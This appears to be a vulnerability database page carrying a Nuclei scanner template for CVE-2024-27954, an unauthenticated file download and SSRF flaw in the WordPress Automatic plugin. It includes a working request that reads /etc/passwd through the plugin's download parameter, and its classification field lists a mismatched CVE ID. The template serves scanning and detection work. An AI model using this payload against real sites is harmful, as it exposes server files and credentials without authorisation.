Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-27954HistoryMar 22, 2024 - 3:33 p.m.
WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
2024-03-2215:33:04
ProjectDiscovery
github.com
140
wordpress
automatic plugin
file download
ssrf
vulnerability
patched
cve
wpscan
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
6.7 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
21.6%
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
id: CVE-2024-27954
info:
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
reference:
- https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
classification:
cvss-score: 9.8
cve-id: CVE-2022-1970
cwe-id: CWE-918
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/wp-automatic"
tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
http:
- method: GET
path:
- "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"link":"file:'
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4b0a00483046022100f4561d82424240be6c3dc4fc29a070e44885e39d14ffcdbddae881eeaf89d958022100cf500bf58250d2b5bf2a94220a8afcd8531d91b7d914c46d485700c5558887ac:922c64590222798bb761d5b6d8e72950Related
cve
cve
githubexploit
githubexploit
Exploit for CVE-2024-27956
2024-05-01 01:58:28
Exploit for CVE-2024-27956
2024-05-15 07:48:54
Exploit for CVE-2024-27956
2024-06-07 04:40:06
cvelist
cvelist
nvd
nvd
nuclei
nuclei
WordPress Automatic Plugin <= 3.92.0 - SQL Injection
2024-04-29 12:00:55
wpvulndb
wpvulndb
Automatic < 3.92.1 - Unauthenticated SQL Injection
2024-03-20 00:00:00
vulnrichment
vulnrichment
osv
osv
CVE-2022-1970
2022-10-19 18:15:12
prion
prion
Open redirect
2022-10-19 18:15:00
redhatcve
redhatcve
CVE-2022-1970
2022-06-07 02:28:48
wallarmlab
wallarmlab
thn
thn
wordfence
wordfence
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
6.7 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
21.6%
Related for NUCLEI:CVE-2024-27954